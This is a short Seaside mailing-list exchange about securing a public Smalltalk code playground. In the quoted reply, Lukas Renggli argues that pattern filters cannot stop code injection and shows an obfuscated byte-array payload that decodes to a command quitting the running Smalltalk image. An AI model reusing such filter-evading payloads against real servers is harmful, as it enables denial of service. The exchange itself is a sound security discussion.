[Seaside] Seaside playground
Gerhard Obermann
obi068 at gmail.com
Mon Jan 11 09:41:43 UTC 2010
Are there any options to make it really secure?
Gerhard
On Mon, Jan 11, 2010 at 10:13 AM, Lukas Renggli <renggli at gmail.com> wrote:
> > Thats not a simple hack.
> > And it doesn't really take over the computer.
>
> Sure. As soon as I can execute arbitrary Smalltalk code on your
> machine, i can deploy a Trojan for your platform.
>
> > Anyway, such hacks are not possible anymore.
>
> There is an infinite number of other hacks. It gets harder over time,
> but the one below is particularly simple:
>
> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>
> My point is that no matter how much time you spend on making it secure
> by checking for particular patterns or strings, there will always be
> ways to fool it. In the Smalltalk world security is inherently weak,
> mostly because of the strong reflective capabilities. I would really
> love to see you application on the web, but in its current form we
> won't be able to run it on seaside.st.
>
> Lukas
>
> --
> Lukas Renggli
> http://www.lukas-renggli.ch
> _______________________________________________
> seaside mailing list
> seaside at lists.squeakfoundation.org
> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.squeakfoundation.org/pipermail/seaside/attachments/20100111/762f4be5/attachment.htm
More information about the seaside
mailing list